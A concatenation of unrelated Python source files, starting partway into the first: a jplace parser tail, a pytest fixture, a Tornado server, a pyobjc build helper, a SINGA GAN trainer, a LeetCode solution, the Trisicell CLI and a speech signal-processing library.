])
for placement in jplace['placements']:
placement_sv = [s[0] for s in placement['nm']]
placement_dl = [pl[field_idx['distal_length']] for pl in placement['p']]
for sv in placement_sv:
writer.writerow([
sv,
len(placement_dl),
min(placement_dl),
])
csv_h.close()
sys.exit(0)
if __name__ == '__main__':
main()
|
from numpy import random
import pytest
@pytest.fixture
def generator(request):
seed_string = request.node.nodeid
seed = [ord(character) for character in seed_string]
return random.default_rng(seed)
|
import tornado.web
from tornado.options import define, options
import tornado.ioloop
import os
from handlers import *
from storage import *
define("db_connstr", help="PostgreSQL connection string")
define("port", default="44321", help="Port for hosting service")
settings = {
"debug" : True,
"gzip" : True,
}
def main(host="0.0.0.0", port=44321):
ioloop = tornado.ioloop.IOLoop.instance()
s = Storage(ioloop, options.db_connstr, 1)
s.connect()
urls = [
(r'/indexpage', IndexHandler, dict(storage=s)),
(r'/article/(?P<link>[a-zA-Z0-9-_]+)', ArticleHandler, dict(storage=s)),
(r'/articleinfos/(?P<tag>[a-zA-Z1-9-_]+)', ArticleInfoHandler, dict(storage=s))
]
app = tornado.web.Application(urls, **settings)
app.listen(port, host)
ioloop.start()
s.close()
if __name__ == "__main__":
tornado.options.parse_command_line()
main("0.0.0.0", options.port)
|
#!/usr/bin/env python3
#
# This is a small script that intercepts the build command, and
# applies it to multiple directories, in parallel.
#
import multiprocessing.dummy
import pathlib
import subprocess
import sys
sys.path.insert(0, "development-support")
import _install_tool
jobs = int(sys.argv[1])
cmd = sys.argv[2:]
dirs = ["pyobjc-core"] + _install_tool.sorted_framework_wrappers()
failed = []
def build(dirpath):
r = subprocess.run(
cmd,
cwd=dirpath,
check=dirpath == "pyobjc-core",
)
if not r:
failed.append(dirpath)
with multiprocessing.dummy.Pool(jobs) as p:
p.map(build, dirs)
print("FAILED:", *failed)
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from singa import device
from singa import opt
from singa import tensor
import argparse
import matplotlib.pyplot as plt
import numpy as np
import os
from model import gan_mlp
from utils import load_data
from utils import print_log
class VANILLA():
def __init__(self,
dev,
rows=28,
cols=28,
channels=1,
noise_size=100,
hidden_size=128,
batch=128,
interval=1000,
learning_rate=0.001,
iterations=1000000,
dataset_filepath='mnist.pkl.gz',
file_dir='vanilla_images/'):
self.dev = dev
self.rows = rows
self.cols = cols
self.channels = channels
self.feature_size = self.rows * self.cols * self.channels
self.noise_size = noise_size
self.hidden_size = hidden_size
self.batch = batch
self.batch_size = self.batch // 2
self.interval = interval
self.learning_rate = learning_rate
self.iterations = iterations
self.dataset_filepath = dataset_filepath
self.file_dir = file_dir
self.model = gan_mlp.create_model(noise_size=self.noise_size,
feature_size=self.feature_size,
hidden_size=self.hidden_size)
def train(self):
train_data, _, _, _, _, _ = load_data(self.dataset_filepath)
dev = device.create_cuda_gpu_on(0)
dev.SetRandSeed(0)
np.random.seed(0)
# sgd = opt.SGD(lr=self.learning_rate, momentum=0.9, weight_decay=1e-5)
sgd = opt.Adam(lr=self.learning_rate)
noise = tensor.Tensor((self.batch_size, self.noise_size), dev,
tensor.float32)
real_images = tensor.Tensor((self.batch_size, self.feature_size), dev,
tensor.float32)
real_labels = tensor.Tensor((self.batch_size, 1), dev, tensor.float32)
fake_labels = tensor.Tensor((self.batch_size, 1), dev, tensor.float32)
# attached model to graph
self.model.set_optimizer(sgd)
self.model.compile([noise],
is_train=True,
use_graph=False,
sequential=True)
real_labels.set_value(1.0)
fake_labels.set_value(0.0)
for iteration in range(self.iterations):
idx = np.random.randint(0, train_data.shape[0], self.batch_size)
real_images.copy_from_numpy(train_data[idx])
self.model.train()
# Training the Discriminative Net
_, d_loss_real = self.model.train_one_batch_dis(
real_images, real_labels)
noise.uniform(-1, 1)
fake_images = self.model.forward_gen(noise)
_, d_loss_fake = self.model.train_one_batch_dis(
fake_images, fake_labels)
d_loss = tensor.to_numpy(d_loss_real)[0] + tensor.to_numpy(
d_loss_fake)[0]
# Training the Generative Net
noise.uniform(-1, 1)
_, g_loss_tensor = self.model.train_one_batch(
noise, real_labels)
g_loss = tensor.to_numpy(g_loss_tensor)[0]
if iteration % self.interval == 0:
self.model.eval()
self.save_image(iteration)
print_log(' The {} iteration, G_LOSS: {}, D_LOSS: {}'.format(
iteration, g_loss, d_loss))
def save_image(self, iteration):
demo_row = 5
demo_col = 5
if not hasattr(self, "demo_noise"):
self.demo_noise = tensor.Tensor(
(demo_col * demo_row, self.noise_size), dev, tensor.float32)
self.demo_noise.uniform(-1, 1)
gen_imgs = self.model.forward_gen(self.demo_noise)
gen_imgs = tensor.to_numpy(gen_imgs)
show_imgs = np.reshape(
gen_imgs, (gen_imgs.shape[0], self.rows, self.cols, self.channels))
fig, axs = plt.subplots(demo_row, demo_col)
cnt = 0
for r in range(demo_row):
for c in range(demo_col):
axs[r, c].imshow(show_imgs[cnt, :, :, 0], cmap='gray')
axs[r, c].axis('off')
cnt += 1
fig.savefig("{}{}.png".format(self.file_dir, iteration))
plt.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Train GAN over MNIST')
parser.add_argument('filepath', type=str, help='the dataset path')
parser.add_argument('--use_gpu', action='store_true')
args = parser.parse_args()
if args.use_gpu:
print('Using GPU')
dev = device.create_cuda_gpu()
else:
print('Using CPU')
dev = device.get_default_device()
if not os.path.exists('vanilla_images/'):
os.makedirs('vanilla_images/')
rows = 28
cols = 28
channels = 1
noise_size = 100
hidden_size = 128
batch = 128
interval = 1000
learning_rate = 0.0005
iterations = 1000000
dataset_filepath = 'mnist.pkl.gz'
file_dir = 'vanilla_images/'
vanilla = VANILLA(dev, rows, cols, channels, noise_size, hidden_size, batch,
interval, learning_rate, iterations, dataset_filepath,
file_dir)
vanilla.train()
|
from collections import Counter
class Solution:
def numSplits(self, s: str) -> int:
left = Counter()
right = Counter(s)
count = 0
for i in range(len(s)):
left[s[i]] += 1
right[s[i]] -= 1
if right[s[i]] == 0:
del right[s[i]]
if len(left) == len(right):
count += 1
return count
s = "aacaba"
res = Solution().numSplits(s)
print(res)
|
from collections import OrderedDict
import click
import trisicell as tsc
from trisicell.commands._bnb import bnb
from trisicell.commands._booster import booster
from trisicell.commands._consensus import consensus
from trisicell.commands._grmt import grmt
from trisicell.commands._huntress import huntress
from trisicell.commands._mcalling import mcalling
from trisicell.commands._partf import partf
from trisicell.commands._phiscs import phiscsb, phiscsi
from trisicell.commands._scistree import scistree
from trisicell.commands._scite import scite
from trisicell.commands._score import score
from trisicell.commands._search import search
from trisicell.commands._sphyr import sphyr
from trisicell.commands._trees import cf2newick, cf2tree
class NaturalOrderGroup(click.Group):
"""Command group trying to list subcommands in the order they were added.
Make sure you initialize the `self.commands` with OrderedDict instance.
With decorator, use::
@click.group(cls=NaturalOrderGroup, commands=OrderedDict())
"""
def list_commands(self, ctx):
"""List command names as they are in commands dict.
If the dict is OrderedDict, it will preserve the order commands
were added.
"""
return self.commands.keys()
# def citation(ctx, param, value):
# print("Please check https://trisicell.readthedocs.io/citing.html")
# ctx.exit(0)
@click.version_option(version=tsc.__version__)
# @click.option("--cite", is_flag=True, callback=citation, help="Show citation bib.")
@click.group(
cls=NaturalOrderGroup,
commands=OrderedDict(),
context_settings={"max_content_width": 300, "terminal_width": 300},
)
def cli():
"""Trisicell.
Scalable intratumor heterogeneity inference and validation from single-cell data.
"""
return None
cli.add_command(mcalling)
cli.add_command(booster)
cli.add_command(partf)
cli.add_command(phiscsb)
cli.add_command(phiscsi)
cli.add_command(scite)
cli.add_command(scistree)
cli.add_command(bnb)
cli.add_command(huntress)
cli.add_command(grmt)
cli.add_command(sphyr)
cli.add_command(cf2newick)
cli.add_command(cf2tree)
cli.add_command(score)
cli.add_command(consensus)
cli.add_command(search)
|
import scipy.io.wavfile as sio
import scipy.signal as sis
from scipy import interpolate
import numpy as np
import math
import matplotlib.pyplot as plt
import mylib as myl
import sys
import copy as cp
import re
import scipy.fftpack as sf
# NOTE: int2float might be removed after scipy update/check
# (check defaults in myl.sig_preproc)
# read wav file
# IN:
# fileName
# OUT:
# signal ndarray
# sampleRate
def wavread(f,opt={'do_preproc':True}):
## signal input
fs, s_in = sio.read(f)
# int -> float
s = myl.wav_int2float(s_in)
# preproc
if opt['do_preproc']:
s = myl.sig_preproc(s)
return s, fs
# DCT
# IN:
# y - 1D signal vector
# opt
# ['fs'] - sample rate
# ['wintyp'] - <'kaiser'>, any type supported by
# scipy.signal.get_window()
# ['winparam'] - <1> additionally needed window parameters,
# scalar, string, list ..., depends on 'wintyp'
# ['nsm'] - <3> number of spectral moments
# ['rmo'] - skip first (lowest) cosine (=constant offset)
# in spectral moment calculation <1>|0
# ['lb'] - lower cutoff frequency for coef truncation <0>
# ['ub'] - upper cutoff frequency (if 0, no cutoff) <0>
# Recommended e.g. for f0 DCT, so that only influence
# of events with <= 10Hz on f0 contour is considered)
# ['peak_prct'] - <80> lower percentile threshold to be superseeded for
# amplitude maxima in DCT spectrum
# OUT:
# dct
# ['c_orig'] all coefs
# ['f_orig'] their frequencies
# ['c'] coefs with freq between lb and ub
# ['f'] their freqs
# ['i'] their indices in c_orig
# ['sm'] spectral moments based on c
# ['opt'] input options
# ['m'] y mean
# ['sd'] y standard dev
# ['cbin'] array of sum(abs(coef)) in frequency bins
# ['fbin'] corresponding lower boundary freqs
# ['f_max'] frequency of global amplitude maximum
# ['f_lmax'] frequencies of local maxima (array of minlen 1)
# ['c_cog'] the coef amplitude of the cog freq (sm[0])
# PROBLEMS:
# - if segment is too short (< 5 samples) lowest freqs associated to
# DCT components are too high for ub, that is dct_trunc() returns
# empty array.
# -> np.nan assigned to respective variables
def dct_wrapper(y,opt):
dflt={'wintyp':'kaiser','winparam':1,'nsm':3,'rmo':True,
'lb':0,'ub':0,'peak_prct':80}
opt = myl.opt_default(opt,dflt)
# weight window
w = sig_window(opt['wintyp'],len(y),opt['winparam'])
y = y*w
#print(1,len(y))
# centralize
y = y-np.mean(y)
#print(2,len(y))
# DCT coefs
c = sf.dct(y,norm='ortho')
#print(3,len(c))
# indices (starting with 0)
ly = len(y)
ci = myl.idx_a(ly)
# corresponding cos frequencies
f = ci+1 * (opt['fs']/(ly*2))
# band pass truncation of coefs
# indices of coefs with lb <= freq <= ub
i = dct_trunc(f,ci,opt)
#print('f ci i',f,ci,i)
# analysis segment too short -> DCT freqs above ub
if len(i)==0:
sm = myl.ea()
while len(sm) <= opt['nsm']:
sm = np.append(sm,np.nan)
return {'c_orig':c,'f_orig':f,'c':myl.ea(),'f':myl.ea(),'i':[],'sm':sm,'opt':opt,
'm':np.nan,'sd':np.nan,'cbin':myl.ea(),'fbin':myl.ea(),
'f_max':np.nan, 'f_lmax':myl.ea(), 'c_cog': np.nan}
# mean abs error from band-limited IDCT
#mae = dct_mae(c,i,y)
# remove constant offset with index 0
# already removed by dct_trunc in case lb>0. Thus checked for i[0]==0
# (i[0] indeed represents constant offset; tested by
# cr = np.zeros(ly); cr[0]=c[0]; yr = sf.idct(cr); print(yr)
if opt['rmo']==True and len(i)>1 and i[0]==0:
j = i[1:len(i)]
else:
j = i
if type(j) is not list: j = [j]
# coefs and their frequencies between lb and ub
# (+ constant offset removed)
fi = f[j]
ci = c[j]
# spectral moments
if len(j)>0:
sm = specmom(ci,fi,opt['nsm'])
else:
sm = np.zeros(opt['nsm'])
# frequency bins
fbin, cbin = dct_fbin(fi,ci,opt)
# frequencies of global and local maxima in DCT spectrum
f_max, f_lmax, px = dct_peak(ci,fi,sm[0],opt)
# return
return {'c_orig':c,'f_orig':f,'c':ci,'f':fi,'i':j,'sm':sm,'opt':opt,
'm':np.mean(y),'sd':np.std(y),'cbin':cbin,'fbin':fbin,
'f_max':f_max, 'f_lmax':f_lmax, 'c_cog': px}
# returns local and max peak frequencies
# IN:
# x: array of abs coef amplitudes
# f: corresponding frequencies
# cog: center of gravity
# OUT:
# f_gm: freq of global maximu
# f_lm: array of freq of local maxima
# px: threshold to be superseeded (derived from prct specs)
def dct_peak(x,f,cog,opt):
x = abs(cp.deepcopy(x))
## global maximum
i = myl.find(x,'is','max')
if len(i)>1:
i=int(np.mean(i))
f_gm = float(f[i])
## local maxima
# threshold to be superseeded
px = dct_px(x,f,cog,opt)
idx = myl.find(x,'>=',px)
# 2d array of neighboring+1 indices
# e.g. [[0,1,2],[5,6],[9,10]]
ii = []
# min freq distance between maxima
fd_min = 1
for i in myl.idx(idx):
if len(ii)==0:
ii.append([idx[i]])
elif idx[i]>ii[-1][-1]+1:
xi = x[ii[-1]]
fi = f[ii[-1]]
j = myl.find(xi,'is','max')
#print('xi',xi,'fi',fi,'f',f[idx[i]])
if len(j)>0 and f[idx[i]]>fi[j[0]]+fd_min:
#print('->1')
ii.append([idx[i]])
else:
#print('->2')
ii[-1].append(idx[i])
#myl.stopgo() #!c
else:
ii[-1].append(idx[i])
# get index of x maximum within each subsegment
# and return corresponding frequencies
f_lm = []
for si in ii:
zi = myl.find(x[si],'is','max')
if len(zi)>1:
zi=int(np.mean(zi))
else:
zi = zi[0]
i = si[zi]
if not np.isnan(i):
f_lm.append(f[i])
#print('px',px)
#print('i',ii)
#print('x',x)
#print('f',f)
#print('m',f_gm,f_lm)
#myl.stopgo()
return f_gm, f_lm, px
# return center-of-gravity related amplitude
# IN:
# x: array of coefs
# f: corresponding freqs
# cog: center of gravity freq
# opt
# OUT:
# coef amplitude related to cog
def dct_px(x,f,cog,opt):
x = abs(cp.deepcopy(x))
# cog outside freq range
if cog <= f[0]:
return x[0]
elif cog >= f[-1]:
return x[-1]
# find f-indices adjacent to cog
for i in range(len(f)-1):
if f[i] == cog:
return x[i]
elif f[i+1] == cog:
return x[i+1]
elif f[i] < cog and f[i+1] > cog:
# interpolate
#xi = np.interp(cog,f[i:i+2],x[i:i+2])
#print('cog:',cog,'xi',f[i:i+2],x[i:i+2],'->',xi)
return np.interp(cog,f[i:i+2],x[i:i+2])
return np.percentile(x,opt['peak_prct'])
# pre-emphasis
# alpha > 1 (interpreted as lower cutoff freq)
# alpha <- exp(-2 pi alpha delta)
# s'[n] = s[n]-alpha*s[n-1]
# IN:
# signal
# alpha - s[n-1] weight <0.95>
# fs - sample rate <-1>
# do_scale - <FALSE> if TRUE than the pre-emphasized signal is scaled to
# same abs_mean value as original signal (in general pre-emphasis
# leads to overall energy loss)
def pre_emphasis(y,a=0.95,fs=-1,do_scale=False):
# determining alpha directly or from cutoff freq
if a>1:
if fs <= 0:
print('pre emphasis: alpha cannot be calculated deltaT. Set to 0.95')
a = 0.95
else:
a = math.exp(-2*math.pi*a*1/fs)
#print('alpha',a)
# shifted signal
ype = np.append(y[0], y[1:] - a * y[:-1])
# scaling
if do_scale:
sf = np.mean(abs(y))/np.mean(abs(ype))
ype*=sf
## plot
#ys = y[30000:40000]
#ypes = ype[30000:40000]
#t = np.linspace(0,len(ys),len(ys))
#fig, spl = plt.subplots(2,1,squeeze=False)
#cid1 = fig.canvas.mpl_connect('button_press_event', onclick_next)
#cid2 = fig.canvas.mpl_connect('key_press_event', onclick_exit)
#spl[0,0].plot(t,ys)
#spl[1,0].plot(t,ypes)
#plt.show()
##
return ype
# frequency bins: symmetric 2-Hz windows around freq integers
# in bandpass overlapped by 1 Hz
# IN:
# f - ndarray frequencies
# c - ndarray coefs
# opt['lb'] - lower and upper truncation freqs
# ['ub']
# OUT:
# fbin - ndarray, lower bnd of freq bins
# cbin - ndarray, summed abs coef values in these bins
def dct_fbin(f,c,opt):
fb = myl.idx_seg(math.floor(opt['lb']),math.ceil(opt['ub']))
cbin = np.zeros(len(fb)-1);
for j in myl.idx_a(len(fb)-1):
k = myl.intersect(myl.find(f,'>=',fb[j]),
myl.find(f,'<=',fb[j+1]))
cbin[j] = sum(abs(c[k]))
fbin = fb[myl.idx_a(len(fb)-1)]
return fbin, cbin
# spectral moments
# IN:
# c - ndarray, coefficients
# f - ndarray, related frequencies <1:len(c)>
# n - number of spectral moments <3>
# OUT:
# m - ndarray moments (increasing)
def specmom(c,f=[],n=3):
if len(f)==0:
f = myl.idx_a(len(c))+1
c = abs(c)
s = sum(c)
k=0;
m = np.asarray([])
for i in myl.idx_seg(1,n):
m = myl.push(m, sum(c*((f-k)**i))/s)
k = m[-1]
return m
# wrapper around IDCT
# IN:
# c - coef vector derived by dct
# i - indices of coefs to be taken for IDCT; if empty (default),
# all coefs taken)
# OUT:
# y - IDCT result
def idct_bp(c,i=myl.ea()):
if len(i)==0:
return sf.idct(c,norm='ortho')
cr = np.zeros(len(c))
cr[i]=c[i]
return sf.idct(cr)
# mean abs error from IDCT
def dct_mae(c,i,y):
cr = np.zeros(len(c))
cr[i]=c[i]
yr = sf.idct(cr)
return myl.mae(yr,y)
# indices to truncate DCT output to freq band
# IN:
# f - ndarray, all frequencies
# ci - all indices of coef ndarray
# opt['lb'] - lower cutoff freq
# ['ub'] - upper cutoff freq
# OUT:
# i - ndarray, indices in F of elements to be kept
def dct_trunc(f,ci,opt):
if opt['lb']>0:
ihp = myl.find(f,'>=',opt['lb'])
else:
ihp = ci
if opt['ub']>0:
ilp = myl.find(f,'<=',opt['ub'])
else:
ilp = ci
return myl.intersect(ihp,ilp)
# wrapper around wavread and energy calculation
# IN:
# f: wavFileName (any number of channels) or array containing
# the signal (any number of channels=columns)
# opt: energy extraction and postprocessing
# .win, .wintyp, .winparam: window parameters
# .sts: stepsize for energy contour
# .do_preproc: centralizing signal
# .do_out: remove outliers
# .do_interp: linear interpolation over silence
# .do_smooth: smoothing (median or savitzky golay)
# .out dict; see pp_outl()
# .smooth dict; see pp_smooth()
# fs: <-1> needed if f is array
# OUT:
# y: time + energy contour 2-dim np.array
# (1st column: time, other columns: energy)
def wrapper_energy(f,opt = {}, fs = -1):
opt = myl.opt_default(opt,{'wintyp':'hamming',
'winparam':'',
'sts':0.01,
'win':0.05,
'do_preproc': True,
'do_out': False,
'do_interp': False,
'do_smooth': False,
'out': {},
'smooth': {}})
opt['out'] = myl.opt_default(opt['out'], {'f': 3,
'm': 'mean'})
opt['smooth'] = myl.opt_default(opt['smooth'],{"mtd": "sgolay",
"win": 7,
"ord": 3})
if type(f) is str:
s, fs = wavread(f,opt)
else:
if fs < 0:
sys.exit("array input requires sample rate fs. Exit.")
s = f
opt['fs']=fs
# convert to 2-dim array; each column represents a channel
if np.ndim(s)==1:
s = np.expand_dims(s, axis=1)
# output (.T-ed later, reserve first list for time)
y = myl.ea()
# over channels
for i in np.arange(0,s.shape[1]):
e = sig_energy(s[:,i],opt)
# setting outlier to 0
if opt['do_out']:
e = pp_outl(e,opt['out'])
# interpolation over 0
if opt['do_interp']:
e = pp_interp(e)
# smoothing
if opt['do_smooth']:
e = pp_smooth(e,opt['smooth'])
# <0 -> 0
e[myl.find(e,'<',0)]=0
y = myl.push(y,e)
# output
if np.ndim(y)==1:
y = np.expand_dims(y, axis=1)
else:
y = y.T
# concat time as 1st column
sts = opt['sts']
t = np.arange(0,sts*y.shape[0],sts)
if len(t) != y.shape[0]:
while len(t) > y.shape[0]:
t = t[0:len(t)-1]
while len(t) < y.shape[0]:
t = np.append(t,t[-1]+sts)
t = np.expand_dims(t, axis=1)
y = np.concatenate((t,y),axis=1)
return y
### replacing outliers by 0 ###################
def pp_outl(y,opt):
if "m" not in opt:
return y
# ignore zeros
opt['zi'] = True
io = myl.outl_idx(y,opt)
if np.size(io)>0:
y[io] = 0
return y
### interpolation over 0 (+constant extrapolation) #############
def pp_interp(y,opt={}):
xi = myl.find(y,'==',0)
xp = myl.find(y,'>',0)
yp = y[xp]
if "kind" in opt:
f = interpolate.interp1d(xp,yp,kind=opt["kind"],
fill_value=(yp[0],yp[-1]))
yi = f(xi)
else:
yi = np.interp(xi,xp,yp)
y[xi]=yi
return y
#!check
### smoothing ########################################
# remark: savgol_filter() causes warning
# Using a non-tuple sequence for multidimensional indexing is deprecated
# will be out with scipy.signal 1.2.0
# (https://github.com/scipy/scipy/issues/9086)
def pp_smooth(y,opt):
if opt['mtd']=='sgolay':
if len(y) <= opt['win']:
return y
y = sis.savgol_filter(y,opt['win'],opt['ord'])
elif opt['mtd']=='med':
y = sis.medfilt(y,opt['win'])
return y
# calculates energy contour from acoustic signal
# do_preproc per default False. If not yet preprocessed by myl.sig_preproc()
# set to True
# IN:
# x ndarray signal
# opt['fs'] - sample frequency
# ['wintyp'] - <'hamming'>, any type supported by
# scipy.signal.get_window()
# ['winparam'] - <''> additionally needed window parameters,
# scalar, string, list ...
# ['sts'] - stepsize of moving window
# ['win'] - window length
# OUT:
# y ndarray energy contour
def sig_energy(x,opt):
dflt={'wintyp':'hamming','winparam':'','sts':0.01,'win':0.05}
opt = myl.opt_default(opt,dflt)
# stepsize and winlength in samples
sts = round(opt['sts']*opt['fs'])
win = min([math.floor(len(x)/2),round(opt['win']*opt['fs'])])
# weighting window
w = sig_window(opt['wintyp'],win,opt['winparam'])
# energy values
y = np.asarray([])
for j in myl.idx_a(len(x)-win,sts):
s = x[j:j+len(w)]*w
y = myl.push(y,myl.rmsd(s))
return y
# wrapper around windows
# IN:
# typ: any type supported by scipy.signal.get_window()
# lng: <1> length
# par: <''> additional parameters as string, scalar, list etc
# OUT:
# window array
def sig_window(typ,l=1,par=''):
if typ=='none' or typ=='const':
return np.ones(l)
if ((type(par) is str) and (len(par) == 0)):
return sis.get_window(typ,l)
return sis.get_window((typ,par),l)
# pause detection
# IN:
# s - mono signal
# opt['fs'] - sample frequency
# ['ons'] - idx onset <0> (to be added to time output)
# ['flt']['f'] - filter options, boundary frequencies in Hz
# (2 values for btype 'band', else 1): <8000> (evtl. lowered by fu_filt())
# ['btype'] - <'band'>|'high'|<'low'>
# ['ord'] - butterworth order <5>
# ['fs'] - (internally copied)
# ['l'] - analysis window length (in sec)
# ['l_ref'] - reference window length (in sec)
# ['e_rel'] - min energy quotient analysisWindow/referenceWindow
# ['fbnd'] - True|<False> assume pause at beginning and end of file
# ['n'] - <-1> extract exactly n pauses (if > -1)
# ['min_pau_l'] - min pause length <0.5> sec
# ['min_chunk_l'] - min inter-pausal chunk length <0.2> sec
# ['force_chunk'] - <False>, if True, pause-only is replaced by chunk-only
# ['margin'] - <0> time to reduce pause on both sides (sec; if chunks need init and final silence)
# OUT:
# pau['tp'] 2-dim array of pause [on off] (in sec)
# ['tpi'] 2-dim array of pause [on off] (indices in s = sampleIdx-1 !!)
# ['tc'] 2-dim array of speech chunks [on off] (i.e. non-pause, in sec)
# ['tci'] 2-dim array of speech chunks [on off] (indices)
# ['e_ratio'] - energy ratios corresponding to pauses in ['tp'] (analysisWindow/referenceWindow)
def pau_detector(s,opt={}):
if 'fs' not in opt:
sys.exit('pau_detector: opt does not contain key fs.')
dflt = {'e_rel':0.0767,'l':0.1524,'l_ref':5,'n':-1,'fbnd':False,'ons':0,'force_chunk':False,
'min_pau_l':0.4,'min_chunk_l':0.2,'margin':0,
'flt':{'btype':'low','f':np.asarray([8000]),'ord':5}}
opt = myl.opt_default(opt,dflt)
opt['flt']['fs'] = opt['fs']
## removing DC, low-pass filtering
flt = fu_filt(s,opt['flt'])
y = flt['y']
## pause detection for >=n pauses
t, e_ratio = pau_detector_sub(y,opt)
if len(t)>0:
## extending 1st and last pause to file boundaries
if opt['fbnd']==True:
t[0,0]=0
t[-1,-1]=len(y)-1
## merging pauses across too short chunks
## merging chunks across too small pauses
if (opt['min_pau_l']>0 or opt['min_chunk_l']>0):
t, e_ratio = pau_detector_merge(t,e_ratio,opt)
## too many pauses?
# -> subsequently remove the ones with highest e-ratio
if (opt['n']>0 and len(t)>opt['n']):
t, e_ratio = pau_detector_red(t,e_ratio,opt)
## speech chunks
tc = pau2chunk(t,len(y))
## pause-only -> chunk-only
if (opt['force_chunk']==True and len(tc)==0):
tc = cp.deepcopy(t)
t = np.asarray([])
e_ratio = np.asarray([])
## add onset
t = t+opt['ons']
tc = tc+opt['ons']
## return dict
## incl fields with indices to seconds (index+1=sampleIndex)
pau={'tpi':t, 'tci':tc, 'e_ratio': e_ratio}
pau['tp'] = myl.idx2sec(t,opt['fs'])
pau['tc'] = myl.idx2sec(tc,opt['fs'])
#print(pau)
return pau
# merging pauses across too short chunks
# merging chunks across too small pauses
# IN:
# t [[on off]...] of pauses
# e [e_rat ...]
# OUT:
# t [[on off]...] merged
# e [e_rat ...] merged (simply mean of merged segments taken)
def pau_detector_merge(t,e,opt):
## min pause and chunk length in samples
mpl = myl.sec2smp(opt['min_pau_l'],opt['fs'])
mcl = myl.sec2smp(opt['min_chunk_l'],opt['fs'])
## merging chunks across short pauses
tm = np.asarray([])
em = np.asarray([])
for i in myl.idx_a(len(t)):
if ((t[i,1]-t[i,0] >= mpl) or
(opt['fbnd']==True and (i==0 or i==len(t)-1))):
tm = myl.push(tm,t[i,:])
em = myl.push(em,e[i])
# nothing done in previous step?
if len(tm)==0:
tm = cp.deepcopy(t)
em = cp.deepcopy(e)
if len(tm)==0:
return t, e
## merging pauses across short chunks
tn = np.asarray([tm[0,:]])
en = np.asarray([em[0]])
if (tn[0,0]<mcl): tn[0,0]=0
for i in np.arange(1,len(tm),1):
if (tm[i,0] - tn[-1,1] < mcl):
tn[-1,1] = tm[i,1]
en[-1] = np.mean([en[-1],em[i]])
else:
tn = myl.push(tn,tm[i,:])
en = myl.push(en,em[i])
#print("t:\n", t, "\ntm:\n", tm, "\ntn:\n", tn) #!v
return tn, en
# pause to chunk intervals
# IN:
# t [[on off]] of pause segments (indices in signal)
# l length of signal vector
# OUT:
# tc [[on off]] of speech chunks
def pau2chunk(t,l):
if len(t)==0:
return np.asarray([[0,l-1]])
if t[0,0]>0:
tc = np.asarray([[0,t[0,0]-1]])
else:
tc = np.asarray([])
for i in np.arange(0,len(t)-1,1):
if t[i,1] < t[i+1,0]-1:
tc = myl.push(tc,[t[i,1]+1,t[i+1,0]-1])
if t[-1,1]<l-1:
tc = myl.push(tc,[t[-1,1]+1,l-1])
return tc
# called by pau_detector
# IN:
# as for pau_detector
# OUT:
# t [on off]
# e_ratio
def pau_detector_sub(y,opt):
## settings
# reference window span
rl = math.floor(opt['l_ref']*opt['fs'])
# signal length
ls = len(y)
# min pause length
ml = opt['l']*opt['fs']
# global rmse and pause threshold
e_rel = cp.deepcopy(opt['e_rel'])
# global rmse
# as fallback in case reference window is likely to be pause
# almost-zeros excluded (cf percentile) since otherwise pauses
# show a too high influence, i.e. lower the reference too much
# so that too few pauses detected
#e_glob = myl.rmsd(y)
ya = abs(y)
qq = np.percentile(ya,[50])
e_glob = myl.rmsd(ya[ya>qq[0]])
t_glob = opt['e_rel']*e_glob
# stepsize
sts=max([1,math.floor(0.05*opt['fs'])])
# energy calculation in analysis and reference windows
wopt_en = {'win':ml,'rng':[0,ls]}
wopt_ref = {'win':rl,'rng':[0,ls]}
# loop until opt.n criterion is fulfilled
# increasing energy threshold up to 1
while e_rel < 1:
# pause [on off], pause index
t=np.asarray([])
j=0
# [e_y/e_rw] indices as in t
e_ratio=np.asarray([])
i_steps = np.arange(1,ls,sts)
for i in i_steps:
# window
yi = myl.windowing_idx(i,wopt_en)
e_y = myl.rmsd(y[yi])
# energy in reference window
e_r = myl.rmsd(y[myl.windowing_idx(i,wopt_ref)])
# take overall energy as reference if reference window is pause
if (e_r <= t_glob):
e_r = e_glob
# if rmse in window below threshold
if e_y <= e_r*e_rel:
yis = yi[0]
yie = yi[-1]
if len(t)-1==j:
# values belong to already detected pause
if len(t)>0 and yis<t[j,1]:
t[j,1]=yie
# evtl. needed to throw away superfluous
# pauses with high e_ratio
e_ratio[j]=np.mean([e_ratio[j],e_y/e_r])
else:
t = myl.push(t,[yis, yie])
e_ratio = myl.push(e_ratio,e_y/e_r)
j=j+1
else:
t=myl.push(t,[yis, yie])
e_ratio = myl.push(e_ratio,e_y/e_r)
# (more than) enough pauses detected?
if len(t) >= opt['n']: break
e_rel = e_rel+0.1
if opt['margin']==0 or len(t)==0:
return t, e_ratio
# shorten pauses by margins
mar=int(opt['margin']*opt['fs'])
tm, erm = myl.ea(), myl.ea()
for i in myl.idx_a(len(t)):
# only slim non-init and -fin pauses
if i>0:
ts = t[i,0]+mar
else:
ts = t[i,0]
if i < len(t)-1:
te = t[i,1]-mar
else:
te = t[i,1]
# pause disappeared
if te <= ts:
# ... but needs to be kept
if opt['n']>0:
tm = myl.push(tm,[t[i,0],t[i,1]])
erm = myl.push(erm,e_ratio[i])
continue
# pause still there
tm = myl.push(tm,[ts,te])
erm = myl.push(erm,e_ratio[i])
return tm, erm
def pau_detector_red(t,e_ratio,opt):
# keep boundary pauses
if opt['fbnd']==True:
n=opt['n']-2
#bp = [t[0,],t[-1,]]
bp = np.concatenate((np.array([t[0,]]),np.array([t[-1,]])),axis=0)
ii = np.arange(1,len(t)-1,1)
t = t[ii,]
e_ratio=e_ratio[ii]
else:
n=opt['n']
bp=np.asarray([])
if n==0:
t=[]
# remove pause with highest e_ratio
while len(t)>n:
i = myl.find(e_ratio,'is','max')
j = myl.find(np.arange(1,len(e_ratio),1),'!=',i[0])
t = t[j,]
e_ratio = e_ratio[j]
# re-add boundary pauses if removed
if opt['fbnd']==True:
if len(t)==0:
t=np.concatenate((np.array([bp[0,]]),np.array([bp[1,]])),axis=0)
else:
t=np.concatenate((np.array([bp[0,]]),np.array([t]),np.array([bp[1,]])),axis=0)
return t, e_ratio
